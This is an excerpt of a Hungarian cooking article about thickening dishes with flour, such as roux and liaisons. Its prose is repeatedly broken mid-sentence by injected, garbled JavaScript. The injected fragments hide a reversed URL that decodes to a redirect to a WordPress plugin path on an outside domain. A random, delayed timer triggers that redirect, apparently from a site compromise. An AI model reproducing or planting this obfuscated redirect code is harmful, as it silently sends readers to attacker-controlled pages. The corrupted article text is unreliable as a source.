A sűrítés vagy más néven kötés is egy a magyar konyhára jellemző ételkészítési eljárás melynek az a lényege, hogy kialakítsuk az adott ételre jellemző, megfelelő állagot a lisztek (elsősorban a keményítő tartalma miatt) vízmegkötő-képességének segítségével. Az állagán kívűl még módosíthatjuk a készülendő étel színét is, például fűszerpaprikával történő rántás esetén. Az ízét különböző fűszerek hozzáadásával, a tápanyagtartalmát pedig attól függően tudjuk befolyásolni, hogy milyen lisztet (fehérliszt, teljeskiőrlésű liszt) vagy egyéb a habaráshoz szükséges segédanyagot választunk (pl. toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tojás, tejföl, joghurt) – írja a szupermenta.hu. A következőkben a mindennapokban is használatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos konyhatechnológiai eljárásokat részletezünk: A rántást elsősorban a liszt pirítási foka határozza meg…
A cikk folytatódik: http://hazesotthon.co.hu/eletstilus/2018/06/24/buzalisztek-szerepe-a-konyhaban.html
- Hirdetés -